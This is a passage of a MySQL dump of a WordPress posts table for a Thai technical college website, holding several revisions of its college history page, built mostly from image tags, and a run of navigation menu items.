height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-20 11:26:43', '2018-02-20 04:26:43', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1233, 3, '2018-02-20 11:30:59', '2018-02-20 04:30:59', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n<a href=\"http://www.technicrayong.ac.th/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n<h3></h3>\r\n<a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-20 11:30:59', '2018-02-20 04:30:59', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1234, 3, '2018-02-20 11:33:44', '2018-02-20 04:33:44', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /> <img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /> <img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /> <img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /> </a>\r\n<h3></h3>\r\n<a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-20 11:33:44', '2018-02-20 04:33:44', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0);
INSERT INTO `wp_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(1235, 3, '2018-02-20 11:37:15', '2018-02-20 04:37:15', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"> <img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /> </a><a href=\"http://www.technicrayong.ac.th/ปรัชญา/\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a><a href=\"http://www.technicrayong.ac.th/พันธกิจ/\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"http://www.technicrayong.ac.th/วิสัยทัศน์/\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n<h3></h3>\r\n<a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-20 11:37:15', '2018-02-20 04:37:15', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1236, 3, '2018-02-20 11:40:04', '2018-02-20 04:40:04', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n<a href=\"/%E0%B8%A7%E0%B8%B4%E0%B8%AA%E0%B8%B1%E0%B8%A2%E0%B8%97%E0%B8%B1%E0%B8%A8%E0%B8%99%E0%B9%8C/\"> </a><a href=\"http://www.technicrayong.ac.th/เอกลักษณ์/\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a><a href=\"/ปรัชญา/\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a><a href=\"/พันธกิจ/\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/วิสัยทัศน์/\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a>\r\n\r\n<a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-20 11:40:04', '2018-02-20 04:40:04', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1237, 3, '2018-02-20 11:42:38', '2018-02-20 04:42:38', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"http://www.technicrayong.ac.th/วิสัยทัศน์/\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"http://www.technicrayong.ac.th/พันธกิจ/\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"http://www.technicrayong.ac.th/ปรัชญา/\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a><a href=\"http://www.technicrayong.ac.th/เอกลักษณ์/\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-20 11:42:38', '2018-02-20 04:42:38', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1238, 3, '2018-02-20 11:43:48', '2018-02-20 04:43:48', '<h3><img class=\"alignleft wp-image-947\" src=\"/wp-content/uploads/2018/02/5-2-2561-11-13-28.jpg\" alt=\"\" width=\"1552\" height=\"650\" /></h3>\r\n<h4><img class=\"alignleft wp-image-952 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-10-53.jpg\" alt=\"\" width=\"826\" height=\"530\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-953 size-full\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-26.jpg\" alt=\"\" width=\"819\" height=\"557\" /></h4>\r\n<h3></h3>\r\n<h4><img class=\"alignleft wp-image-954\" src=\"/wp-content/uploads/2018/02/5-2-2561-14-11-46.jpg\" alt=\"\" width=\"819\" height=\"568\" /></h4>\r\n \r\n\r\n \r\n\r\n \r\n\r\n<a href=\"/วิสัยทัศน์/\"><img class=\"alignnone wp-image-1200 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-07-46-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/พันธกิจ/\"><img class=\"alignnone wp-image-1204 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-25-300x111.jpg\" alt=\"\" width=\"300\" height=\"111\" /></a><a href=\"/ปรัชญา/\"><img class=\"alignnone wp-image-1203 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-08-12-300x117.jpg\" alt=\"\" width=\"300\" height=\"117\" /></a><a href=\"/เอกลักษณ์/\"><img class=\"alignnone wp-image-1201 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-13-08-300x112.jpg\" alt=\"\" width=\"300\" height=\"112\" /></a>\r\n\r\n<a href=\"/%E0%B8%AD%E0%B8%B1%E0%B8%95%E0%B8%A5%E0%B8%B1%E0%B8%81%E0%B8%A9%E0%B8%93%E0%B9%8C/\"><img class=\"alignnone wp-image-1202 size-medium\" src=\"/wp-content/uploads/2018/02/19-2-2561-11-12-53-300x114.jpg\" alt=\"\" width=\"300\" height=\"114\" /></a>\r\n<h3 style=\"color: #49616b; font-family: -apple-system, BlinkMacSystemFont, \'Segoe UI\', Roboto, Oxygen-Sans, Ubuntu, Cantarell, \'Helvetica Neue\', sans-serif; font-style: normal; font-variant-ligatures: normal; font-variant-caps: normal; letter-spacing: normal; orphans: 2; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px; -webkit-text-stroke-width: 0px; text-decoration-style: initial; text-decoration-color: initial;\"><img class=\"wp-image-1214 size-full aligncenter\" style=\"height: auto; max-width: 100%; display: block; margin-left: auto; margin-right: auto;\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-06-48.jpg\" alt=\"\" width=\"821\" height=\"175\" /></h3>\r\n<img class=\"aligncenter wp-image-1218 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-14-35-59.jpg\" alt=\"\" width=\"1078\" height=\"508\" />\r\n\r\n<img class=\"aligncenter wp-image-1224 size-full\" src=\"/wp-content/uploads/2018/02/19-2-2561-16-13-26-1.jpg\" alt=\"\" width=\"1079\" height=\"515\" /><img class=\"aligncenter wp-image-1230\" src=\"/wp-content/uploads/2018/02/20-2-2561-11-17-30.jpg\" alt=\"\" width=\"1500\" height=\"777\" />\r\n\r\n \r\n\r\n ', 'ประวัติวิทยาลัย', '', 'inherit', 'closed', 'closed', '', '930-revision-v1', '', '', '2018-02-20 11:43:48', '2018-02-20 04:43:48', '', 930, 'http://www.technicrayong.ac.th/930-revision-v1/', 0, 'revision', '', 0),
(1240, 3, '2018-02-21 10:22:05', '2018-02-21 03:22:05', '', 'Home', '', 'publish', 'closed', 'closed', '', 'home-2', '', '', '2018-08-14 14:51:04', '2018-08-14 07:51:04', '', 0, 'http://www.technicrayong.ac.th/?p=1240', 1, 'nav_menu_item', '', 0),
(1241, 3, '2018-02-21 10:22:05', '2018-02-21 03:22:05', '', 'News', '', 'publish', 'closed', 'closed', '', 'news-2', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1241', 2, 'nav_menu_item', '', 0),
(1242, 3, '2018-02-21 10:22:06', '2018-02-21 03:22:06', '', 'Events', '', 'publish', 'closed', 'closed', '', 'events-2', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1242', 3, 'nav_menu_item', '', 0),
(1243, 3, '2018-02-21 10:22:06', '2018-02-21 03:22:06', '', 'About The College', '', 'publish', 'closed', 'closed', '', 'about-the-college', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1243', 4, 'nav_menu_item', '', 0),
(1244, 3, '2018-02-21 10:22:06', '2018-02-21 03:22:06', '', '9 Types Information', '', 'publish', 'closed', 'closed', '', '9-types-informations', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1244', 5, 'nav_menu_item', '', 0),
(1245, 3, '2018-02-21 10:22:06', '2018-02-21 03:22:06', '', 'Province\'s Basic Information', '', 'publish', 'closed', 'closed', '', 'provinces-basic-information', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1245', 6, 'nav_menu_item', '', 0),
(1246, 3, '2018-02-21 10:22:06', '2018-02-21 03:22:06', '', 'College Information', '', 'publish', 'closed', 'closed', '', 'college-information', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1246', 7, 'nav_menu_item', '', 0),
(1247, 3, '2018-02-21 10:22:06', '2018-02-21 03:22:06', '', 'Student\'s Information', '', 'publish', 'closed', 'closed', '', 'students-information', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1247', 8, 'nav_menu_item', '', 0),
(1248, 3, '2018-02-21 10:22:06', '2018-02-21 03:22:06', '', 'Corporate information', '', 'publish', 'closed', 'closed', '', 'corporations-information', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1248', 9, 'nav_menu_item', '', 0),
(1249, 3, '2018-02-21 10:22:06', '2018-02-21 03:22:06', '', 'Staff Information', '', 'publish', 'closed', 'closed', '', 'staff-information', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1249', 10, 'nav_menu_item', '', 0),
(1250, 3, '2018-02-21 10:22:06', '2018-02-21 03:22:06', '', 'Budget Information', '', 'publish', 'closed', 'closed', '', 'budget-information', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1250', 11, 'nav_menu_item', '', 0),
(1251, 3, '2018-02-21 10:22:07', '2018-02-21 03:22:07', '', 'Learning & Teaching Course Information', '', 'publish', 'closed', 'closed', '', 'learning-teaching-course-information', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1251', 12, 'nav_menu_item', '', 0),
(1252, 3, '2018-02-21 10:22:07', '2018-02-21 03:22:07', '', 'Durable Articles Information', '', 'publish', 'closed', 'closed', '', 'durable-articles-information', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1252', 13, 'nav_menu_item', '', 0),
(1253, 3, '2018-02-21 10:22:07', '2018-02-21 03:22:07', '', 'Building Information', '', 'publish', 'closed', 'closed', '', 'building-informations', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1253', 14, 'nav_menu_item', '', 0),
(1254, 3, '2018-02-21 10:22:07', '2018-02-21 03:22:07', '', 'Board of Directors', '', 'publish', 'closed', 'closed', '', 'board-of-directors', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1254', 15, 'nav_menu_item', '', 0),
(1255, 3, '2018-02-21 10:22:07', '2018-02-21 03:22:07', '', 'History', '', 'publish', 'closed', 'closed', '', 'history', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1255', 16, 'nav_menu_item', '', 0),
(1256, 3, '2018-02-21 10:22:07', '2018-02-21 03:22:07', '', 'Vision', '', 'publish', 'closed', 'closed', '', 'vision', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1256', 17, 'nav_menu_item', '', 0),
(1257, 3, '2018-02-21 10:22:07', '2018-02-21 03:22:07', '', 'Mission', '', 'publish', 'closed', 'closed', '', 'mission', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1257', 18, 'nav_menu_item', '', 0),
(1258, 3, '2018-02-21 10:22:08', '2018-02-21 03:22:08', '', 'Philosophy', '', 'publish', 'closed', 'closed', '', 'philosophy', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1258', 19, 'nav_menu_item', '', 0),
(1259, 3, '2018-02-21 10:22:08', '2018-02-21 03:22:08', '', 'Uniqueness', '', 'publish', 'closed', 'closed', '', 'uniqueness', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1259', 20, 'nav_menu_item', '', 0),
(1260, 3, '2018-02-21 10:22:08', '2018-02-21 03:22:08', '', 'Identity', '', 'publish', 'closed', 'closed', '', 'identity', '', '', '2018-08-14 14:51:05', '2018-08-14 07:51:05', '', 0, 'http://www.technicrayong.ac.th/?p=1260', 21, 'nav_menu_item', '', 0),
